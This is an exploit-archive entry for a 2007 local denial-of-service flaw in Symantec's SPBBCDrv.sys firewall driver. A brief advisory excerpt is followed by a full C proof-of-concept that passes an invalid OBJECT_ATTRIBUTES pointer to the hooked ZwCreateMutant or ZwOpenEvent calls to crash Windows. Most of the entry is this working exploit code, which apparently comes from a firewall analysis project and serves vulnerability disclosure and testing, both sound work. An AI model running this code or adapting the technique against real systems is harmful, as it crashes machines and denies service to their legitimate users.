Symantec (Multiple Products) - SPBBCDrv Driver Local Denial of Service

2007-04-01T00:00:00
ID EXPLOITPACK:E66CBFF77695B70FBB7C539F5448CFC9
Type exploitpack
Reporter David Matousek
Modified 2007-04-01T00:00:00

Description

Symantec (Multiple Products) - SPBBCDrv Driver Local Denial of Service

                                        
                                            // source: https://www.securityfocus.com/bid/23241/info

Multiple Symantec products are prone to a local denial-of-service vulnerability.

This issue occurs when attackers supply invalid argument values to the 'SPBBCDrv.sys' driver.

A local attacker may exploit this issue to crash affected computers, denying service to legitimate users. 

/*

 Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P002NF)
 

 Usage:
 prog FUNCNAME
   FUNCNAME - name of function to be checked

 Description:
 This program calls given function with parameters that cause the crash of the system. This happens because of 
 insufficient check of function arguments in the driver of the firewall.

 Test:
 Running the testing program with the name of function from the list of functions with insufficient check
 of arguments.

*/

#undef __STRICT_ANSI__
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <ddk/ntapi.h>
#include <ddk/ntifs.h>

void about(void)
{
  printf("Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P002NF)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2007 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/""\n\n");
  return;
}

void usage(void)
{
  printf("Usage: test FUNCNAME\n"
         "  FUNCNAME - name of function to be checked\n");
  return;
}


int main(int argc,char **argv)
{
  about();

  if (argc!=2)
  {
    usage();
    return 1;
  }

  if (!stricmp(argv[1],"NtCreateMutant") || !stricmp(argv[1],"ZwCreateMutant"))
  {
    HANDLE handle;
    OBJECT_ATTRIBUTES oa;
    InitializeObjectAttributes(&oa,(PVOID)1,0,NULL,NULL);

    ZwCreateMutant(&handle,0,&oa,FALSE);

  } else if (!stricmp(argv[1],"NtOpenEvent") || !stricmp(argv[1],"ZwOpenEvent"))
  {
    HANDLE handle;
    OBJECT_ATTRIBUTES oa;
    InitializeObjectAttributes(&oa,(PVOID)1,0,NULL,NULL);

    ZwOpenEvent(&handle,0,&oa);
  } else printf("\nI do not know how to exploit the vulnerability using this function.\n");

  printf("\nTEST FAILED!\n");
  return 1;
}